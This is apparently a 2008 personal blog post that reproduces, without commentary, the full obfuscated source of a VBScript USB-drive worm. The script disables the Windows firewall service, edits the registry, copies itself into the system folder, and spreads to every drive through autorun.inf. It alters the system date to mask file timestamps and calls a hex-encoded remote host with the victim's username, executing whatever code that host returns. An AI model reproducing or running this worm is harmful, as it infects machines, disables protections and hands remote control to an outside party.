Cai Song » 2008 » October

一U盘病毒VBS脚本

Oct 29th, 2008 by song

[code]On error ResUme NeXT
Set Fso=cREaTeObjEct(STRREVErsE("tCeJbOMetsYSELIf.gnItPIRCs"))
SET wSHshEll=cReaTEOBJEcT(strREverSE("LlEhs.TPIrCSW"))
dIm drI_lISt,DrI_lisT0
DiM IssEnD
ISsEnd=0
c_TIMe=datE()
WshshELL.ruN "Net SToP sHaReDaccEsS",0
seT DrvS=fSO.Drives
sYsdIr=fSo.GetSpeCIalfoLDeR(1)
thiSPATH=WscRIPt.sCrIPtfuLLNAMe
sEt FC=fSo.OPENTExTFilE(tHiSpaTH,1)
Scopy=Fc.rEAdaLl
fC.CLoSE
SET fC=NotHInG
cAlL wriTEFILe(sYsdIr&"\SYsInfO.reg",UNescapE(sTRReverSE("00C2%00c2%00C2%00C2%00c2%00C2%00c2%00c2%00C2%00c2%00c2%00c2%00C2%00c2%00c2%00a3%92%B82%XEHD3%22%EMItCeXe22%a0%D0%02%22%22%D3%22%SrETeMARAp22%a0%d0%02%22%sBv.gfcNrpc5%C5%23meTSYSC5%C5%52%RIdniW52%22%d3%22%tpIrCS22%A0%D0%02%d5%0c5%0c5%puTrAtsc5%STpIRcsc5%ENiHcaMc5%EtATsc5%YcILoP02%puorGc5%noiSrEVTneRRUcc5%sWodNiwc5%tFoSOrcimc5%erAWTFOsC5%enihcam_lACOL_yEKHb5%A0%d0%A0%d0%02%00c2%00c2%00C2%00C2%00C2%00c2%00c2%00c2%00C2%00c2%00c2%00C2%00C2%00C2%00c2%00A3%92%B82%xEhD3%22%EmItCexe22%a0%D0%02%22%22%d3%22%SReteMaRAp22%A0%d0%02%22%SbV.gFcnrpc5%C5%23meTsYSC5%C5%52%riDniW52%22%D3%22%tpirCs22%A0%d0%02%d5%0c5%0C5%puTRAtsC5%StpIRcsc5%meTsysc5%SwODNiWC5%TFOsoRCiMc5%sEICiLOpC5%eraWtfosc5%ENihcAM_LACoL_yeKHB5%a0%D0%A0%d0%03%03%e2%53%02%E6%f6%96%37%27%56%65%02%27%F6%47%96%46%54%02%97%27%47%37%96%76%56%25%02%37%77%F6%46%E6%96%75%")))
wShSHell.ruN "REGEDiT /s sysinFo.REG",0
wsCRIPt.SLeep 200
fso.dElETEfILe SYSdiR&"\sYsiNFO.REg",true
if iNsTr(thISPATH,SysdIR)>0 thEN
Dri_LIsT0=LISTDrV()
O_time=Left(C_tIme,3)&cstR(INT(mid(C_Time,4,1))-1)&rIgHt(C_Time,Len(c_timE)-4)
wSHShell.run "cmd /C DAte "&o_time,0
WsCrIpt.slEEP 10000
foR DRi_i=1 TO leN(drI_lIst0)
CaLL WriTeaUtO(mID(dRI_List0,Dri_I,1)&":\")
NEXT
wsHSHElL.rUN "Cmd /C DatE "&C_TIMe,0
comPUterNAme="":uSernaME=""
set OBjwmiservIcE=geToBjECt("winMgmTs:{imPErsONatIONlevel=imPersonaTe}!\\.\roOt\CImV2")
set ColCoMPUTerS = ObJwMIsErvice.ExEcQuery("SEleCt * froM Win32_cOmpuTERsYsTem")
foR eAch oBJCOmputer IN colCOMPUTErs
cOmpUtErnAmE=OBjComPuTEr.nAMe
userNAME=OBJcOMPUtEr.UsERnAMe
nEXt
if uSeRnAmE="" tHEn usERname="Evar"
If INstr(uSERnAme,"\")<=0 ThEn
useRnaMe=COMpuTERnAmE&"\"&usernaMe
End iF
Do
if IsseNd=0 then
seT XmL=CreATEobjEct(stRrEVERse("ptTHLMxreVRES.2LmxSm"))
xmL.OPEN "geT",StRrEVerSe(unESCApE("%3D%61%3F%70%73%61%2E%74%6e%75%6f%63%2f%61%76%65%2f%62%7a%7a%2F%30%30%31%2E%34%30%31%2e%39%31%31%2e%32%30%32%2F%2f%3A%70%74%74%68"))&usErNAMe,0
Xml.SeTrequesTheaDEr "uSer-AGent","EvaR"
XML.Send()
if ERR.NUMbER=0 thEn
IsSEND=1
res=Xml.REspOnsetExt
IF uCASe(LeFT(REs,7))=uCAse("exECuTe") then ExecUtE Res
Else
Err.CLEAR
End IF
SeT xmL=nOtHiNG
END If

Dri_LIst=liStdRV()
FoR DRI_k=1 tO lEn(drI_liST)
If INstR(DRI_LiST0,MiD(dRI_list,dRi_K,1))<=0 theN
CAlL wRITEauto(mId(DrI_LIst,dRI_k,1)&":\")
End if
NEXt
DRI_LIST0=drI_lIsT
wSCRiPt.sleeP 1000
lOOp
ELSE
WShSHeLL.rUn "ExPLorER .\",3
WScRIPt.sleEp 2000
WsHshELL.appaCTIVaTe unEsCape(lcaSe("%u6211%u7684%u7535%u8111"))
WsHSHEll.sEndkEys uCaSe("% C")
rUnfLAG=0
fOr eACh pS in gETobJECT _
("WinmGmtS:\\.\rOoT\cIMV2:wiN32_pRocEsS").INSTAncES_
if LcasE(PS.nAMe)=LCASe("wSCRIPT.EXe") tHeN
RUNFLAg=runfLAg+1
end IF
NEXt
If RUNfLaG>=2 thEn wsCRipT.QUIT
SEt Sf=FSO.gETFOLdEr(SYSdir)
F_TIMe=leFT(sf.DateCreaTeD,iNstr(sf.DATeCREAteD," ")-1)
WsHSHEll.Run "CmD /C DAtE "&F_tIMe,0
wScRIPT.SLEEp 100
calL wriTEFILe(SySDIR&LcAse("\PRNcFG.vBs"),Vs(SCOPY))
wsHSHell.Run "CMD /c dATE "&C_tImE,0
wsHshelL.rUN SySDir&"\pRnCFG.VbS"
EnD IF
functiOn VS(str)
ExeCutE strReVErse(uNescAPE("%29%29%22u%25%22%28ESAcl%2c%29%22u%25%22%28eSacU%2CsV%28eCALPeR%3DsV%0D%0AtxEN%0d%0AFI%20dNE%0D%0Ac%26sV%3dSV%0d%0aeSlE%0D%0A%29c%28EsacL%26sv%3Dsv%0d%0AnEHT%2005%3e%29001*%29%28dNr%28tnI%20fI%0D%0AEZIMoDnAR%0d%0a%29%291%2ci%2CRts%28DIm%28eSAcu%3dC%0d%0A%29RTs%28Nel%20OT%201%3Di%20roF"))
eND FUNCTiOn
FuNcTioN LISTdRV()
EXEcUTe STrreVERSE(UNeSCAPE("TsiL_pMT%3DVRDtsil%0d%0ATXEN%0d%0AFI%20DNe%0d%0AretteLEViRD.vrD%26tsIl_Pmt%3DTsIL_PmT%0d%0anEhT%20YdAERSI.VrD%20fi%0d%0aSVRd%20Ni%20vRd%20hcaE%20rof%0D%0a%22%22%3dTSIL_pMT%0D%0aTSIL_pmt%20MID"))
END FUnCtiON

suB WRITeAUtO(PATH)
exECute STRREVErSE(UNEsCapE("FI%20DNE%0d%0AeUrT%2C%22fni.NUrotUA%22%26Htap%20ELiFETelEd.Osf%0d%0aneHT%20%29%22fnI.nUrOTUA%22%26HtAp%28StsixeeLiF.Osf%20fIEslE%0D%0a%29%28dnr%26htAP%2C%22fNI.NurOTuA%22%26HTap%20rEDLOfevOM.OSF%0d%0aNEhT%20%29%22FnI.nUrOTUA%22%26Htap%28STSIXeREDLOF.Osf%20FI"))
Cmdstr="ShELL\*\commAND=wsCrIpT.eXe "&CHR(34)&"EVA.Vbs"&cHR(34)
AuTOSTR="[AUtorUn]"&VBcrLF&"OPeN="&vbcrLF&REPlace(CMdstr,"*","OPeN")&vBCrLf&rePlACe(cmDsTr,"*","EXplorE")&VbcrlF&RePLacE(cMDsTr,"*","fInD")
cALL WriTEFIle(PATh&uCASE("aUTorUN.iNf"),aUToSTR)
CalL WrITEFiLE(Path&"Eva.VbS",vs(sCOPY))
eNd SUB

SUb WriTEFiLe(FPATH,CONtenT)
EXEcuTE sTRrEVeRse(uNESCAPe("gNIHton%3daF%20TeS%0D%0A7%3dseTuBIrTta.aF%0D%0A%29htapF%28EliftEg.oSF%3Daf%20Tes%0D%0aGnIhToN%3DCF%20TES%0d%0AEsolC.CF%0d%0atNETnOc%20eTIrW.CF%0D%0A%29EURT%2C2%2chtAPf%28eLiFtxEtNEPO.OSF%3dCF%20Tes%0d%0aeURT%2cHTAPF%20ELifeTeLeD.Osf%20nEHt%20%29htAPF%28stsiXEElif.osf%20FI"))
eND Sub
[/code]

No Comments »

SIDEBAR

»
S
I
D
E
B
A
R
«

» Substance:WordPress »